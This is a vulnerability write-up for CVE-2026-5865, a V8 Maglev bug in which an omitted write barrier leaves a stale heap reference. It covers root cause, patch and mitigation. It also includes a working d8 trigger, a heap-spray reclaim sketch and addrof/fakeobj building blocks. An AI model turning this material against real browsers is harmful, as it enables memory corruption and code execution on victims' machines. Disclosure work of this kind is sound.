Summary
CVE-2026-5865 is a Maglev miscompilation bug in V8’s Phi retagging path. A
nested Phi selected as untagged Int32 can be retagged with
Int32ToNumber[kCanonicalizeSmi], which may produce a HeapNumber, while a
later Smi-specialized field store still assumes the value is always a Smi and
emits a no-write-barrier store.
That breaks a core GC invariant: a heap pointer can be written into an object field without notifying the garbage collector. In practice, that stale reference can be reclaimed and replaced, turning a compiler bug into stable V8 exploitation primitives.
Impact & exploitability
This is not just a “wrong type” bug in abstract IR. Once Maglev optimizes a
property store as Smi-only, the generated code can store a freshly allocated
HeapNumber into that field without a barrier when execution later produces a
value outside the Smi range.
The attacker model is remote JavaScript execution in Chrome. A malicious page
can warm the target function up with Smis, trigger Maglev compilation, then
invoke the same code with a boundary value that forces Int32ToNumber to
materialize a heap object.
From there, the bug yields a practical use-after-GC style primitive:
- Attacker model: remote webpage / renderer-context JavaScript
- Primitive: omitted write barrier on a heap object store
- Practical impact: stale HeapNumber reference, then fake object and address-of primitives
- End result: arbitrary memory read/write in the V8 process, and full RCE when chained in a non-sandboxed environment or with a sandbox escape
Root cause
The bug sits in the interaction between Maglev’s Phi representation selection and Smi-specialized field stores.
When an outer Phi stays tagged but takes an input from an inner Phi that was
selected as untagged Int32, EnsurePhiInputsTagged inserts a tagging
conversion on that incoming edge:
```cpp
void MaglevPhiRepresentationSelector::EnsurePhiInputsTagged(Phi* phi) {
  const int skip_backedge = phi->is_loop_phi() ? 1 : 0;
  for (int i = 0; i < phi->input_count() - skip_backedge; i++) {
    ValueNode* input = phi->input(i).node();
    if (Phi* phi_input = input->TryCast<Phi>()) {
      phi->change_input(i,
                        EnsurePhiTagged(phi_input, phi->predecessor_at(i),
                                        BasicBlockPosition::End(), nullptr, i));
    } else {
      DCHECK(input->is_tagged());
    }
  }
}
```

Because this path does not pass force_smi, Maglev may emit
Int32ToNumber[kCanonicalizeSmi]. That conversion is not guaranteed to return
a Smi: values outside the Smi range become HeapNumber objects instead.
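To make the boundary concrete, here is a small d8 sketch (an illustration, not code from the write-up). It assumes a pointer-compressed build, where Smis are 31-bit signed integers, and a shell started with --allow-natives-syntax:

```js
// Run in d8 with --allow-natives-syntax (assumed harness).
// On pointer-compressed builds, 2**30 - 1 is the largest Smi and
// 2**30 must be boxed as a HeapNumber.
const MAX_SMI = 2 ** 30 - 1;  // 1073741823
%DebugPrint(MAX_SMI);         // printed as a Smi
%DebugPrint(MAX_SMI + 1);     // printed as a HeapNumber
```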
Later, TryBuildStoreField can still select a Smi-only field store based on
warmup feedback:
```cpp
if (field_representation.IsSmi()) {
  RETURN_IF_ABORT(GetAccumulatorSmi(UseReprHintRecording::kDoNotRecord));
}
```
```cpp
if (field_representation.IsSmi()) {
  RETURN_IF_ABORT(BuildStoreTaggedFieldNoWriteBarrier(
      store_target, value, field_index.offset(), store_mode, name));
}
```

The intended safety check is GetAccumulatorSmi(), but in this path
BuildCheckSmi() can return early when the value has already been narrowed by
static type information:
```cpp
ReduceResult MaglevGraphBuilder::BuildCheckSmi(
    ValueNode* object, bool elidable,
    AllowWideningSmiToInt32 allow_widening_smi_to_int32) {
  if (object->StaticTypeIs(broker(), NodeType::kSmi)) return object;
  // ...
}
```

That is unsound here. The tagged alternative produced by
Int32ToNumber[kCanonicalizeSmi] may be a HeapNumber, yet the store still
takes the no-write-barrier path because Maglev trusted the earlier Smi
assumption.
A minimal example from the write-up is:
```js
function f(a, b, x) {
  let y = a ? x + 1 : 1;
  let t = y | 0;
  let z = b ? y : 1;
  obj.x = z;
  return obj.x;
}
```

If warmup only observes Smis, obj.x = z compiles as a no-write-barrier Smi
store. Calling the optimized function with x = 1073741823 then makes
x + 1 overflow the Smi range, forcing Int32ToNumber[kCanonicalizeSmi] to
allocate a HeapNumber that gets stored without a write barrier.
Reproducer
The trigger is a warmup-then-boundary-value sequence:
```js
// Assumed harness: d8 with --allow-natives-syntax and --expose-gc.
// MAX_SMI definition assumed from the overflow value given above.
const MAX_SMI = 2 ** 30 - 1;  // 1073741823

function blah(o, a, b, x) {
  let y;
  if (a) {
    y = x + 1;
  } else {
    y = 1;
  }
  const t = y | 0;
  let z;
  if (b) {
    z = y;
  } else {
    z = 1;
  }
  o.x = z;
  return t;
}

const obj = { x: 1 };
const warmup = { x: 1 };

for (let i = 0; i < 4; i++) gc();

%PrepareFunctionForOptimization(blah);
for (let i = 0; i < 2000; i++) {
  blah(warmup, true, true, i & 1023);
  blah(warmup, false, true, i & 1023);
  blah(warmup, true, false, i & 1023);
}

%OptimizeMaglevOnNextCall(blah);
blah(warmup, true, true, 7);
blah(obj, true, true, MAX_SMI);
gc({ type: 'major' });
```

The important transition is the last call. Warmup convinces Maglev that the
field store is Smi-only; the final MAX_SMI input forces a HeapNumber
allocation, and the subsequent major GC can reclaim that object even though
the stale pointer remains in obj.x.
Exploit
The public exploit turns the stale HeapNumber reference into a fake object
primitive. After the backing HeapNumber is collected, heap spraying can
reclaim the same memory with controlled array data, so obj.x starts pointing
into attacker-shaped contents.
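As an illustration only, the reclaim step tends to look like the sketch below; the spray count and array shape are assumptions for this sketch, not the exploit's exact parameters:

```js
// Illustrative reclaim sketch (assumed shapes and counts, not the
// exploit's exact code): after the stale pointer is planted and the
// HeapNumber is collected, spray arrays so their backing data may land
// at the freed address.
const spray = [];
for (let i = 0; i < 0x4000; i++) {
  // Double elements let the attacker place controlled 64-bit patterns.
  spray.push([1.1, 2.2, 3.3, 4.4]);
}
// If a spray allocation reclaims the slot, obj.x now points into
// attacker-controlled contents.
```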
From there, the write-up bootstraps a fake array object and then stabilizes
addrof/fakeobj by confusing PACKED_DOUBLE_ELEMENTS with
PACKED_ELEMENTS. That is enough to obtain arbitrary V8 heap read/write in
the validation environment.
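A standard building block in this kind of pipeline, shown here as a generic sketch rather than code from the write-up, is reinterpreting between doubles and their raw 64-bit patterns; this is what lets leaked element data be treated as pointers once addrof/fakeobj are in place:

```js
// Generic double<->bits helpers common to V8 exploits of this shape;
// not specific to this write-up.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

function ftoi(f) { f64[0] = f; return u64[0]; }  // double -> raw bits
function itof(i) { u64[0] = i; return f64[0]; }  // raw bits -> double
```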
The full write-up includes the Maglev IR reasoning, the GC invariant break, and the fakeobj/addrof exploitation path.
Patch
The upstream fix hardens BuildCheckSmi() so that a static Smi type hint no
longer suppresses the runtime check when the check is not elidable:
```diff
 ReduceResult MaglevGraphBuilder::BuildCheckSmi(
     ValueNode* object, bool elidable,
     AllowWideningSmiToInt32 allow_widening_smi_to_int32) {
-  if (object->StaticTypeIs(broker(), NodeType::kSmi)) return object;
+  if (object->StaticTypeIs(broker(), NodeType::kSmi) && elidable) return object;
   // Check for the empty type first so that we catch the case where
   // GetType(object) is already empty.
```

That change prevents the unsound fast path in the Smi-specialized store case and restores the guarantee that a no-write-barrier field store only happens when the stored value is actually proven to be a Smi.
The fix shipped in Chrome 147.0.7727.55 on Apr 7, 2026.
Mitigation
The real mitigation is to update Chrome. According to the disclosure, the bug was introduced in Chrome 130 and fixed in Chrome 147, so the affected window is Chrome 130 through Chrome 146.
There is no meaningful site-level workaround for end users because the bug is triggered by crafted JavaScript running inside the renderer. If the fix cannot be deployed immediately, the only way to reduce exposure is to limit use of affected Chrome builds for untrusted browsing until the fixed release is installed.
Timeline & credit
Nebula Security reported the issue to Google on Mar 11, 2026. Google acknowledged the report on Mar 12, 2026, identified the root cause the same day, and shipped the fix on Apr 7, 2026. The public deep-dive followed on May 7, 2026.